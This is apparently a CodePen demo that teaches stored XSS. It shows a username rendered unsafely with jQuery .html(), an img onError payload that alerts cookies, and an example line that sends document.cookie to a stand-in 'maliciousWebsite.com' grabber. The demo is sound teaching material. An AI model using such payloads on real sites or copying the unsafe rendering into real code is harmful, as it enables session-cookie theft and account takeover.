Any URL's added here will be added as
If active, Pens will autosave every 30 seconds after being saved once.
If enabled, the preview panel updates automatically as you code. If disabled, use the "Run" button to update.
If enabled, your code will be formatted when you actively save your Pen. Note: your code becomes un-folded during formatting.
Visit your global Editor Settings.
<hr/> <div> Welcome <span class="username">user</span> </div> <hr/> <ol> <li>Comment the first username and uncomment the second username.</li> <li>The second username has an invalid image, since it's invalid image, the onError event is fired, and now the attack has control over your browser page.</li> <li>How can this damage me ? Imagine this is a comment in a E-commerce website The E-commerce website uses token authentification by cookies.</li> <li>The attacker can send your cookies (including your tokens) to a malicious website (onError="window.location.replace("http://maliciousWebsite.com/urlArgumentGrabber/"</li> + document.cookie);") <li>The attacker can either perform an action off your behalf (see: https://www.theguardian.com/technology/2014/jun/11/twitter-tweetdeck-xss-flaw-users-vulnerable)</li> <li>A lot of different way of retrieving informations are available to the attacker.</li> </ol>
document.cookie = "secretToken=the cake is a lie"; var username = 'non malicious john doe'; // var username = '<img onError="alert(document.cookie)" style="display:none" src="invalidPath">malicious john doe'; $('.username').html(username);
Also see: Tab Triggers